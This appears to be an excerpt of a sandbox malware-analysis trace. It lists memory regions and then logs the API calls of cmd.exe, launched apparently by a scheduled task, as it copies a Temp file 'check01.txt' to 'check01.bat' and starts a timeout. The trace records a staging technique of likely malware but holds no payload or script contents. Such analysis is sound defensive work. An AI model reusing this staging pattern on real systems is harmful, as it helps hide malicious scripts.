name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 1569
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1570
start_va = 0x2b0000
end_va = 0x316fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1571
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1572
start_va = 0x7fefb8b0000
end_va = 0x7fefb8b7fff
monitored = 0
entry_point = 0x7fefb8b11a0
region_type = mapped_file
name = "winbrand.dll"
filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll")
Region:
id = 1573
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1574
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1575
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1576
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1577
start_va = 0x320000
end_va = 0x48ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000320000"
filename = ""
Region:
id = 1578
start_va = 0x320000
end_va = 0x41ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000320000"
filename = ""
Region:
id = 1579
start_va = 0x480000
end_va = 0x48ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000480000"
filename = ""
Region:
id = 1580
start_va = 0x170000
end_va = 0x198fff
monitored = 0
entry_point = 0x171010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1581
start_va = 0x490000
end_va = 0x617fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000490000"
filename = ""
Region:
id = 1582
start_va = 0x170000
end_va = 0x198fff
monitored = 0
entry_point = 0x171010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1583
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1584
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1585
start_va = 0x620000
end_va = 0x7a0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000620000"
filename = ""
Region:
id = 1586
start_va = 0x7b0000
end_va = 0x1baffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007b0000"
filename = ""
Region:
id = 1587
start_va = 0x50000
end_va = 0x6ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cmd.exe.mui"
filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")
Region:
id = 1588
start_va = 0x70000
end_va = 0x16ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000070000"
filename = ""
Region:
id = 1589
start_va = 0x170000
end_va = 0x170fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000170000"
filename = ""
Region:
id = 1590
start_va = 0x180000
end_va = 0x180fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000180000"
filename = ""
Region:
id = 1591
start_va = 0x190000
end_va = 0x19ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000190000"
filename = ""
Region:
id = 1592
start_va = 0x1bb0000
end_va = 0x1e7efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Thread:
id = 83
os_tid = 0xb44
[0372.690] GetProcAddress (hModule=0x77660000, lpProcName="SetConsoleInputExeNameW") returned 0x77670c80
[0372.691] GetProcessHeap () returned 0x70000
[0372.691] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x4012) returned 0x8c620
[0372.691] GetProcessHeap () returned 0x70000
[0372.692] HeapFree (in: hHeap=0x70000, dwFlags=0x0, lpMem=0x8c620 | out: hHeap=0x70000) returned 1
[0372.693] _wcsicmp (_String1="copy", _String2=")") returned 58
[0372.693] _wcsicmp (_String1="FOR", _String2="copy") returned 3
[0372.693] _wcsicmp (_String1="FOR/?", _String2="copy") returned 3
[0372.693] _wcsicmp (_String1="IF", _String2="copy") returned 6
[0372.693] _wcsicmp (_String1="IF/?", _String2="copy") returned 6
[0372.693] _wcsicmp (_String1="REM", _String2="copy") returned 15
[0372.694] _wcsicmp (_String1="REM/?", _String2="copy") returned 15
[0372.694] GetProcessHeap () returned 0x70000
[0372.694] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0xb0) returned 0x89eb0
[0372.694] GetProcessHeap () returned 0x70000
[0372.694] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x1a) returned 0x84750
[0372.702] GetProcessHeap () returned 0x70000
[0372.702] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0xe6) returned 0x89f70
[0372.704] GetProcessHeap () returned 0x70000
[0372.704] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0xb0) returned 0x8a060
[0372.706] _wcsicmp (_String1="timeout", _String2=")") returned 75
[0372.706] _wcsicmp (_String1="FOR", _String2="timeout") returned -14
[0372.706] _wcsicmp (_String1="FOR/?", _String2="timeout") returned -14
[0372.706] _wcsicmp (_String1="IF", _String2="timeout") returned -11
[0372.706] _wcsicmp (_String1="IF/?", _String2="timeout") returned -11
[0372.706] _wcsicmp (_String1="REM", _String2="timeout") returned -2
[0372.706] _wcsicmp (_String1="REM/?", _String2="timeout") returned -2
[0372.706] GetProcessHeap () returned 0x70000
[0372.706] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0xb0) returned 0x8a120
[0372.706] GetProcessHeap () returned 0x70000
[0372.706] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x20) returned 0x84780
[0372.707] GetProcessHeap () returned 0x70000
[0372.707] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x16) returned 0x88610
[0372.709] GetConsoleTitleW (in: lpConsoleTitle=0x2af910, nSize=0x104 | out: lpConsoleTitle="taskeng.exe") returned 0xb
[0372.710] _wcsicmp (_String1="copy", _String2="DIR") returned -1
[0372.710] _wcsicmp (_String1="copy", _String2="ERASE") returned -2
[0372.710] _wcsicmp (_String1="copy", _String2="DEL") returned -1
[0372.711] _wcsicmp (_String1="copy", _String2="TYPE") returned -17
[0372.711] _wcsicmp (_String1="copy", _String2="COPY") returned 0
[0372.711] GetProcessHeap () returned 0x70000
[0372.711] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x1bc) returned 0x8a1e0
[0372.713] GetProcessHeap () returned 0x70000
[0372.713] RtlReAllocateHeap (Heap=0x70000, Flags=0x0, Ptr=0x8a1e0, Size=0xe6) returned 0x8a1e0
[0372.713] GetProcessHeap () returned 0x70000
[0372.713] RtlSizeHeap (HeapHandle=0x70000, Flags=0x0, MemoryPointer=0x8a1e0) returned 0xe6
[0372.716] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0372.716] GetProcessHeap () returned 0x70000
[0372.716] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0xf0) returned 0x8a2e0
[0372.716] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a28c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0372.716] GetProcessHeap () returned 0x70000
[0372.716] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x58) returned 0x71320
[0372.716] GetProcessHeap () returned 0x70000
[0372.716] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x58) returned 0x71380
[0372.717] GetProcessHeap () returned 0x70000
[0372.717] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x20) returned 0x847b0
[0372.717] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
[0372.717] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
[0372.717] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
[0372.717] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
[0372.717] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
[0372.717] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
[0372.717] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
[0372.717] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
[0372.717] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3
[0372.717] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
[0372.718] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
[0372.718] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
[0372.721] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
[0372.721] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
[0372.721] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
[0372.721] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
[0372.721] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
[0372.721] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0372.721] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0372.721] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0372.721] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0372.721] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0372.721] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0372.721] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0372.721] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0372.722] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
[0372.722] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
[0372.722] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
[0372.722] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
[0372.722] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
[0372.722] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
[0372.722] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
[0372.722] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
[0372.722] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
[0372.722] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
[0372.722] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
[0372.722] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
[0372.722] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
[0372.722] GetProcessHeap () returned 0x70000
[0372.723] HeapFree (in: hHeap=0x70000, dwFlags=0x0, lpMem=0x847b0 | out: hHeap=0x70000) returned 1
[0372.725] GetProcessHeap () returned 0x70000
[0372.725] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x20) returned 0x847b0
[0372.725] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
[0372.725] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
[0372.725] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
[0372.725] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
[0372.726] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
[0372.726] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
[0372.726] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
[0372.726] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
[0372.726] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3
[0372.726] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
[0372.726] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
[0372.726] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
[0372.726] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
[0372.726] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
[0372.726] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
[0372.726] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
[0372.726] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
[0372.727] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0372.727] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0372.727] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0372.727] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0372.727] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0372.727] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0372.727] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0372.727] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0372.727] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
[0372.727] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
[0372.727] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
[0372.728] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
[0372.728] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
[0372.728] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
[0372.728] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
[0372.728] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
[0372.728] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
[0372.728] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
[0372.728] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
[0372.728] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
[0372.728] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
[0372.728] GetProcessHeap () returned 0x70000
[0372.729] HeapFree (in: hHeap=0x70000, dwFlags=0x0, lpMem=0x847b0 | out: hHeap=0x70000) returned 1
[0372.729] GetProcessHeap () returned 0x70000
[0372.729] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x1bc) returned 0x713e0
[0372.731] GetProcessHeap () returned 0x70000
[0372.731] RtlReAllocateHeap (Heap=0x70000, Flags=0x0, Ptr=0x713e0, Size=0xe6) returned 0x713e0
[0372.731] GetProcessHeap () returned 0x70000
[0372.731] RtlSizeHeap (HeapHandle=0x70000, Flags=0x0, MemoryPointer=0x713e0) returned 0xe6
[0372.731] _wcsnicmp (_String1="/y", _String2="/Y", _MaxCount=0x2) returned 0
[0372.731] GetProcessHeap () returned 0x70000
[0372.731] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x58) returned 0x714e0
[0372.731] GetProcessHeap () returned 0x70000
[0372.731] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x260) returned 0x71540
[0372.732] _wcsicmp (_String1="check01.txt", _String2=".") returned 53
[0372.732] _wcsicmp (_String1="check01.txt", _String2="..") returned 53
[0372.732] GetFileAttributesW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.txt")) returned 0x2020
[0372.734] GetProcessHeap () returned 0x70000
[0372.734] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x58) returned 0x717b0
[0372.734] GetProcessHeap () returned 0x70000
[0372.734] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x260) returned 0x71810
[0372.734] _wcsicmp (_String1="check01.bat", _String2=".") returned 53
[0372.734] _wcsicmp (_String1="check01.bat", _String2="..") returned 53
[0372.734] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x27, ProcessInformation=0x2af678, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x2af678, ReturnLength=0x0) returned 0x0
[0372.735] NtSetInformationProcess (ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x27, ProcessInformation=0x2af674, ProcessInformationLength=0x4) returned 0x0
[0372.735] VirtualAlloc (lpAddress=0x0, dwSize=0xfe00, flAllocationType=0x1000, flProtect=0x4) returned 0x190000
[0372.735] FindFirstFileExW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.txt"), fInfoLevelId=0x1, lpFindFileData=0x71550, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x71550) returned 0x71a80
[0372.735] GetProcessHeap () returned 0x70000
[0372.735] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x0, Size=0x28) returned 0x847b0
[0372.736] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat", nBufferLength=0x104, lpBuffer=0x2ae490, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat", lpFilePart=0x0) returned 0x30
[0372.736] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt", _String2="con") returned -53
[0372.736] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ae6b0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x58
[0372.736] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3
[0372.737] _get_osfhandle (_FileHandle=3) returned 0x58
[0372.737] GetFileType (hFile=0x58) returned 0x1
[0372.737] SetErrorMode (uMode=0x0) returned 0x8001
[0372.737] SetErrorMode (uMode=0x1) returned 0x0
[0372.737] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt", nBufferLength=0x208, lpBuffer=0x2aefd0, lpFilePart=0x2ae700 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt", lpFilePart=0x2ae700*="check01.txt") returned 0x30
[0372.737] SetErrorMode (uMode=0x8001) returned 0x1
[0372.738] _get_osfhandle (_FileHandle=3) returned 0x58
[0372.738] ReadFile (in: hFile=0x58, lpBuffer=0x190000, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae734, lpOverlapped=0x0 | out: lpBuffer=0x190000*, lpNumberOfBytesRead=0x2ae734*=0x200, lpOverlapped=0x0) returned 1
[0372.740] SetErrorMode (uMode=0x0) returned 0x8001
[0372.741] SetErrorMode (uMode=0x1) returned 0x0
[0372.741] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat", nBufferLength=0x208, lpBuffer=0x2ae2c0, lpFilePart=0x2ae2b0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat", lpFilePart=0x2ae2b0*="check01.bat") returned 0x30
[0372.741] SetErrorMode (uMode=0x8001) returned 0x1
[0372.741] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt", _String2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat") returned 18
[0372.741] GetProcessHeap () returned 0x70000
[0372.741] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x260) returned 0x71ae0
[0372.741] _wcsicmp (_String1="check01.bat", _String2=".") returned 53
[0372.741] _wcsicmp (_String1="check01.bat", _String2="..") returned 53
[0372.742] GetFileAttributesW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat")) returned 0xffffffff
[0372.742] GetLastError () returned 0x2
[0372.742] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat", nBufferLength=0x104, lpBuffer=0x2ae490, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat", lpFilePart=0x0) returned 0x30
[0372.742] SetErrorMode (uMode=0x0) returned 0x8001
[0372.743] SetErrorMode (uMode=0x1) returned 0x0
[0372.743] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat", nBufferLength=0x208, lpBuffer=0x2ae2c0, lpFilePart=0x2ae2b0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat", lpFilePart=0x2ae2b0*="check01.bat") returned 0x30
[0372.744] SetErrorMode (uMode=0x8001) returned 0x1
[0372.744] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt", _String2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat") returned 18
[0372.744] GetFileAttributesW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat")) returned 0xffffffff
[0372.744] CopyFileExW (lpExistingFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.txt"), lpNewFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), lpProgressRoutine=0x0, lpData=0x0, pbCancel=0x4a27e19c, dwCopyFlags=0x0) returned 1
[0372.763] GetFileAttributesW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat")) returned 0x2020
[0372.763] SetFileAttributesW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat", dwFileAttributes=0x2020) returned 1
[0372.764] _close (_FileHandle=3) returned 0
[0372.764] _get_osfhandle (_FileHandle=-1) returned 0xffffffffffffffff
[0372.764] GetFileType (hFile=0xffffffffffffffff) returned 0x0
[0372.764] _get_osfhandle (_FileHandle=-1) returned 0xffffffffffffffff
[0372.764] SetFileTime (hFile=0xffffffffffffffff, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x2ae798) returned 0
[0372.765] FindNextFileW (in: hFindFile=0x71a80, lpFindFileData=0x71550 | out: lpFindFileData=0x71550*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x99073dc0, ftCreationTime.dwHighDateTime=0x1dab598, ftLastAccessTime.dwLowDateTime=0x99073dc0, ftLastAccessTime.dwHighDateTime=0x1dab598, ftLastWriteTime.dwLowDateTime=0x99073dc0, ftLastWriteTime.dwHighDateTime=0x1dab598, nFileSizeHigh=0x0, nFileSizeLow=0xf32, dwReserved0=0x0, dwReserved1=0x0, cFileName="check01.txt", cAlternateFileName="")) returned 0
[0372.767] GetLastError () returned 0x12
[0372.767] FindClose (in: hFindFile=0x71a80 | out: hFindFile=0x71a80) returned 1
[0372.767] NtSetInformationProcess (ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x27, ProcessInformation=0x2af678, ProcessInformationLength=0x4) returned 0x0
[0372.768] _vsnwprintf (in: _Buffer=0x4a29ad20, _BufferCount=0x103, _Format="%9d", _ArgList=0x2af658 | out: _Buffer=" 1") returned 9
[0372.768] _get_osfhandle (_FileHandle=1) returned 0x7
[0372.768] GetFileType (hFile=0x7) returned 0x2
[0372.769] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0372.769] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2af578 | out: lpMode=0x2af578) returned 1
[0372.769] _get_osfhandle (_FileHandle=1) returned 0x7
[0372.770] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2af5b0 | out: lpConsoleScreenBufferInfo=0x2af5b0) returned 1
[0372.770] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x4a296340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) copied.\r\n") returned 0x14
[0372.771] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x4a296340, nSize=0x2000, Arguments=0x2af620 | out: lpBuffer=" 1 file(s) copied.\r\n") returned 0x1b
[0372.771] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a296340*, nNumberOfCharsToWrite=0x1b, lpNumberOfCharsWritten=0x2af5a0, lpReserved=0x0 | out: lpBuffer=0x4a296340*, lpNumberOfCharsWritten=0x2af5a0*=0x1b) returned 1
[0372.772] GetConsoleTitleW (in: lpConsoleTitle=0x2af910, nSize=0x104 | out: lpConsoleTitle="taskeng.exe") returned 0xb
[0372.773] _wcsicmp (_String1="timeout", _String2="DIR") returned 16
[0372.773] _wcsicmp (_String1="timeout", _String2="ERASE") returned 15
[0372.773] _wcsicmp (_String1="timeout", _String2="DEL") returned 16
[0372.773] _wcsicmp (_String1="timeout", _String2="TYPE") returned -16
[0372.774] _wcsicmp (_String1="timeout", _String2="COPY") returned 17
[0372.774] _wcsicmp (_String1="timeout", _String2="CD") returned 17
[0372.774] _wcsicmp (_String1="timeout", _String2="CHDIR") returned 17
[0372.774] _wcsicmp (_String1="timeout", _String2="RENAME") returned 2
[0372.775] _wcsicmp (_String1="timeout", _String2="REN") returned 2
[0372.775] _wcsicmp (_String1="timeout", _String2="ECHO") returned 15
[0372.775] _wcsicmp (_String1="timeout", _String2="SET") returned 1
[0372.775] _wcsicmp (_String1="timeout", _String2="PAUSE") returned 4
[0372.775] _wcsicmp (_String1="timeout", _String2="DATE") returned 16
